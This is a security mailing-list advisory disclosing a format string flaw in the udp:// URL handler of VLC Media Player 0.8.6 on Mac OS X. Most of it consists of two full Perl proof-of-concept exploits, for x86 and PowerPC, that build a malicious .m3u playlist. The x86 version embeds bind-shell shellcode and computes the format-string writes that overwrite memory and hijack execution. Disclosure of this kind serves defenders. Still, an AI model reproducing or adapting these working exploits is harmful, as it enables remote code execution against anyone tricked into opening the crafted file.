The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
VLC Media Player UDP URL Handler Format String Vulnerability
------------------------------------------------------------------------
SUMMARY
VideoLAN is "a software project, which produces free software for video,
released under the GNU General Public License. The main product is the
cross-platform VLC media player - a highly portable multimedia player for
various audio and video formats".
A format string vulnerability exists in the handling of the udp:// URL
handler. By supplying a specially crafted string, a remote attacker could
cause an arbitrary code execution condition, under the privileges of the
user running VLC.
DETAILS
Vulnerable Systems:
* VLC version 0.8.6 for Mac OS X
* Previous versions and other platforms might be affected
Proof of concept:
The exploit(s) provided will create a M3U file, which can be locally
opened or served remotely via web server. The exploit source code includes
notes and other comments about the different options available. Both x86
and PowerPC versions are provided.
Exploit x86:
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC
Player for OSX to execute arbitrary code.
#
$outfile = "pwnage.m3u";
$bindshell =
"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c\x89" .
"\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a" .
"\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97" .
"\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49\x0f\x89\xf1\xff" .
"\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" .
"\x54\x54\x53\x53\xb0\x3b\xcd\x80";
# MALLOC 02800000-03008000 [ 8224K] rw-/rwx SM=COW
..e_0x1300000
# Pattern found @ 0x298589e
# Pattern found @ 0x298ba92
$jmpaddr = 0x41424344;
$lo = ($jmpaddr >> 0) & 0xffff;
$hi = ($jmpaddr >> 16) & 0xffff;
printf "jump address is: 0x%x%x\n", $hi, $lo;
$format = "%25" . ($lo-0x24) . "d" . "%25" . "23" . "%24" . "hn" . "%25" .
($hi-$lo) . "d" . "%25" . "24" . "%24" . "hn" ;
$writeaddr = 0xa0011393 ; # <dyld_stub___vfprintf>
printf "writing to file: %s\n", $outfile;
open(PWNED,">$outfile");
print PWNED "#EXTM3U\n" . "#EXTINF:0,1-07 " . "\x90" x 50 . $bindshell .
"\n" .
"udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format . "i" x (999 - length("Can't get file status for ") ) . "\n";
close(PWNED);
Exploit PPC:
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is just a vanilla format string exploit for OSX on ppc. We
overwrite a saved return addy with our shellcode address.
# This code currently overwrites the saved return addy with the stack
location of our shellcode.
#
# This exploit will create a malicious .m3u file that will cause VLC
Player for OSX to execute arbitrary code.
#
# 0xf02031d2: "--? 0j? 0h%11$hn.%12$hn", 'X' <repeats 177 times>...
# 0xf020329a: 'X' <repeats 200 times>...
# 0xf0203362: 'X' <repeats 200 times>...
# 0xf020342a: 'X' <repeats 200 times>...
# 0xf02034f2: 'X' <repeats 194 times>, "ZY"
# 0xf02035b7: ""
# 0xf02035b8: 'X' <repeats 16 times>, "? 5?\005\017G?? 60"
# 0xf02035d5: ""
# 0xf02035d6: ""
# 0xf02035d7: "\004\005\016
$format =
# make it more robust yourself... I'm lazy
# land in 0xf020 3362 - middle of shellcode
# "%2511%24hn.%2512%24hn" .
#
"%25" . (0x3362-0x24) . "d" . "%25" . "11" . "%24" . "hn" .
"%25" . 0xBCBE . "d" . "%25" . "12" . "%24" . "hn" ;
# 0xf020 3068 saved ret for MsgQueue()
$writeaddr = 0xf0203068;
open(PWNED,">pwnage.m3u");
print PWNED "#EXTM3U\n" ."udp://--" . pack('l', $writeaddr+2) . pack('l',
$writeaddr) .
$format ."i" x (999 - length("Can't get file status for ") ) ."\n";
close(PWNED);
ADDITIONAL INFORMATION
The information has been provided by
<mailto:kf_lists@digitalmunition.com> Kevin Finisterre.
The original article can be found at:
<http://projects.info-pull.com/moab/MOAB-02-01-2007.html>
http://projects.info-pull.com/moab/MOAB-02-01-2007.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
